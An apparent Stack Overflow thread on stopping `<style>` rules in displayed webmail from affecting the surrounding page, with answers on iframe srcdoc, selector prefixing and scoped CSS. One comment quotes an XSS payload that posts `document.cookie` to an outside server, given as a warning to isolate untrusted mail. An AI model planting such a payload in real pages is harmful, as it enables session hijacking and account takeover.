# How to sandboxing a <style> declaration in html?

Tags: javascript, html, css, stylesheet

I'm building an interface for a webmail: I receive the content of the mail, I put it in a `<div>` element where it display the message.
The problem is that every mail has the `<style>` tag with the rules to style the message, but is possible that some of these rules are valid even for my html code, the one outer of the div where I display the message.

e.g.

```
<body>
<h1>inbox</h1>
<div class="message">{here i put the message html}</div> 
</body>
```

the message html contain this:

```
<style>
body { background: red}
</style>
```

So, when my page renders, it has the red background. 
I want that the properties declared in the `<div class="message">` are rendered only here.

Comment: You could try using an iframe instead of a div, with inlined source.

Comment: Why not append your "outer" div's with another class? like `class="container-message"` ?

Comment: Iframe. Not only will this fix your CSS, but putting it on another domain can also prevent me from sending you an e-mail containing `<script>$.post("http://myserver.com", document.cookie)</script>` and being able to log in to your webmail.

Answer (score 0):

You could use an `iframe` with `srcdoc` property, like

```
<iframe srcdoc="&lt;style&gt;body { background: red}&lt;/style&gt;"></iframe>
```

The whole e-mail content must be placed in the srcdoc, properly escaped.

You can read more about it [here](https://developer.mozilla.org/it/docs/Web/HTML/Element/iframe).

Comment: It seems the onbly solution. But I cannot get to preserve the spaces and carrier return. any advice?

Answer (score 0):

You can do this by changing the CSS rule from:

```
<style>
body { background: red}
</style>
```

To:

```
<style>
.message { background: red}
</style>
```

And prefix every CSS rule that must be applied only inside `<div>` with class `message`, with the `.message` selector.

Answer (score 0):

[Scoped CSS](https://css-tricks.com/saving-the-day-with-scoped-css/) is what you need.

```
<div>
  <style scoped>
    h1 { color: FireBrick;   }
    p  { color: SaddleBrown; }
  </style>
  <h1>This is an H1 in a scoped div. Regardless of global styles the text should be "FireBrick".</h1>
  <p>This is a paragraph in a scoped div. The text should be "SaddleBrown".</p>
</div>
```

Now, the styles will only apply to `h1` and `p` that are inside the div.

Comment: this is great, but it is supported only by firefox :( http://caniuse.com/#search=scoped

Comment: bad luck. I was hearing about this from 2 years back. Its unfortunate that it is still not supported by all browser vendors.

Answer (score 0):

You're (*almost*) in luck, there's a feature for that! [Scoped Styles](https://developer.mozilla.org/en/docs/Web/HTML/Element/style#A_scoped_stylesheet) is part of the HTML5 spec, and it's a perfect fit for your problem. The problem (and hence *almost*), is [very poor native support](http://caniuse.com/#feat=style-scoped).

The solution is presented in [this article](https://css-tricks.com/saving-the-day-with-scoped-css/), it uses a [jQuery based polyfill](https://github.com/thingsinjars/jQuery-Scoped-CSS-plugin).

In short, and where the standard is supported, you could add the `scoped` keyword to you style tag and you're done (will only work in firefox for now):

```html
<div>
  <style scoped>
    span {
      color: red;
    }
  </style>
  <span>What color am I?</span>
</div>
<span>And what color am I?</span>
```